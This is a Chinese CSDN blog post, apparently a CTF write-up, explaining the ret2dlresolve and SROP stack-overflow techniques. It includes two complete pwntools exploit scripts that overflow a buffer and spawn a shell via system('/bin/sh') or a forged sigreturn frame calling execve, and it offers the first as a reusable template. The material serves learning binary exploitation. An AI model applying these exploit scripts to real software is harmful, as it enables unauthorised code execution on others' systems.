ret2dlresolve以及srop

最新推荐文章于 2024-08-04 22:29:38 发布
最新推荐文章于 2024-08-04 22:29:38 发布
阅读量565 收藏 11
点赞数 10
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81031055/article/details/136239482
版权

ret2dlresolve

ret2dlsolve的核心原理就是利用了 延迟绑定 技术,linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了

具体详情https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/

 

 用32位IDA分析

发现只有一个read函数,没有打印函数,我们就不能通过libc,syscall去解题,因为无法打印出libc基址

这里我们可以直接通过脚本去获取权限

脚本如下:

from pwn import *
p=process("./pwn32")
elf = context.binary = ELF('./pwn32')
#p = remote("pwn.node.game.sycsec.com",11111)
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * (0x48+4))
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
p.interactive()

在这里我们只需要去修改文件名,以及填充的垃圾数据。

以后做这类题目可以直接套用上面的脚本,当然,如果是64为的话,也是一样的呦

srop

具体详情:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/srop/

 

查看保护,用IDA分析

 

我们不能直接用ret2syscall去解题,因为没有给我们所需要的寄存器

所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!

将rdi寄存器控制成/bin/sh的地址,rsi,rdx寄存器控制成0,rax寄存器控制成0x3b(也就是execve)

 

由于我们在读入数据+8 之后,栈顶的位置成了我们读入数据的位置,发生了偏移,所以将+8去掉,栈顶会指向主函数,就会解决这个问题!

这下就说明我们修改成功啦

伪造信息时我们会用到pwntools里面的工具

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = stack
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall

 这就是我们修改寄存器里面的内容的步骤,当然,还能修改其他寄存器,视情况而定。

 下面就是找栈地址的偏移

找到偏移为296 !

 脚本如下:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn")
elf=ELF("./pwn")
def bug():
	gdb.attach(p)
	pause()
syscall=0x400517

pay=b'a'*(0x10)+p64(0x4004ED)
bug()
p.send(pay)

stack=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(stack))
 
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = stack-296
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
 
 
pause()
pay=b'/bin/sh\x00'*2+p64(0x4004DA)+p64(syscall)+bytes(frame)

p.send(pay)
p.interactive()

☜.♡.☞
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
栈溢出利用之return to dl-resolve实例
M021的专栏
10-07 3524
最近学习了一下漏洞原理与利用,学习到栈溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就不赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。
xctf攻防世界_echo——爬坑之路(ret2dlresolve
勤劳的小蜜蜂
05-27 952
很容易看到是栈溢出漏洞,而且给出了一个sample()的函数来读取flag,直接覆盖返回地址,在本地调试很快就弄完了。但是没想到,跟服务器连接后,死活出不来。没办法,想到上一篇文章一样的坑,看来只能拿Shell才行了。 查找了很多资料,一开始想着用write()函数泄漏,结果没这个函数。还动过使用fprintf函数的想法,但是远程太坑了。留几个学习到的点: 1、 gbd中可以使...
ret2dl-resolve
fa1c4的blog
04-19 354
最早是2015年在一篇论文中提出的攻击技术. How the ELF Ruined Christmas 因为通常漏洞利用包含两个阶段 信息泄露, 得知内存布局 通过已知内存布局, 利用漏洞 但由于不是常常能够得知内存信息, 所以ret2dl-resolve是一种仅仅利用ELF文件格式和动态装载器弱点进行漏洞利用的方法. 符号解析图示 .rel.plt段由Elf_Rel结构体构成 Elf_Rel结构体 struct Elf32_Rel { Elf32_Addr r_offset; // Loca
浅析ret2dl_reslove
最新发布
2301_79327647的博客
08-04 1026
/Dynamic entry type(动态段标识号)union} d_un;//动态段起始地址//表示重定位所作用的虚拟地址或got表处的真实地址//这是一个复合值,包括了重定位类型和符号表下标其中我们需要记住r_info是一个复合值,其高32位表示该重定位项在动态链接符号表.dynsym中对应项的下标,低32位表示该重定位项的重定向类型。/* 符号名,符号在字符串表STRTAB中的偏移 *//* 符号类型及绑定属性 */
Ret2dlresolveSrop
weixin_66751120的博客
03-08 1427
介绍了ret2dlresolvesrop利用工具构造脚本进行解题的方法
pwn-ret2dl-resolve
CharlesGodX的博客
05-04 532
pwn-ret2dl-resolve 0x00:漏洞介绍 ret2dl-resovle这种技术在pwn中的运用也挺多的,可以类比Windows下的IAT技术进行学习,了解这个技术之前,我们需要知道ELF文件中各个函数的加载过程,下面就演示一下GOT表是如何加载的,首先我们编译一个简单的程序 #include <stdio.h> int main() { puts("Hello ...
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 853
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
ret2dlresolve学习(1)
F_Day_的博客
10-22 203
ret2dlresolve学习(1) ret2dlresolve主要是利用函数_dl_runtime_resolve来进行 这个函数是用来对动态链接函数进行重定位的 它最简单的利用就是直接修改重定位表项 构造一个存在栈溢出的例子 #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); ret
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3829
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
matlab price2ret,Convert return series to price series for time series object
weixin_42510600的博客
03-21 1150
ret2tick (fts)Convert return series to price series for time series objectret2tick (fts) is not recommended. Use ret2tick instead.SyntaxpriceFts = ret2tick(returnFts)priceFts = ret2tick(returnFts,'PAR...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8240
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 406
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
ret2dlresolve归纳
am_03的博客
09-02 264
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj一直为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移 原理: 1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项 2.- 伪造重定向表表项,修改第二项里符号表索
ret2dlresolve利用方法
九层台
05-10 2374
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
【ret2dlresolve】学习和体会
ethan18的博客
08-07 64
我们用reloc_offset找到.rel.plt中的对应结构体,再通过rel_info在.dynsym中找到第[rel_info >>8]个结构体,最后通过st_name在.dynstr中找到第st_name个参数,这个参数是个字符串,表示的就是我们要的函数的名字。这里我画个图,手画的比较粗糙,来解释一下_dl_runtime_resolve(link_map,reloc_offset)函数。PLT[0]的保存的指针指向_dl_runtime_resolve的第一个参数:link_map。
【pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3609
ret2dlreslove
死活不懂ret2_dl_runtime_resolve,留着以后学
哒君的博客
07-27 347
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#ret2_dl_runtime_resolve https://bbs.pediy.com/thread-227034.htm https://xz.aliyun.com/t/5122#toc-10 https://www.freebuf.co...
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 5072
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值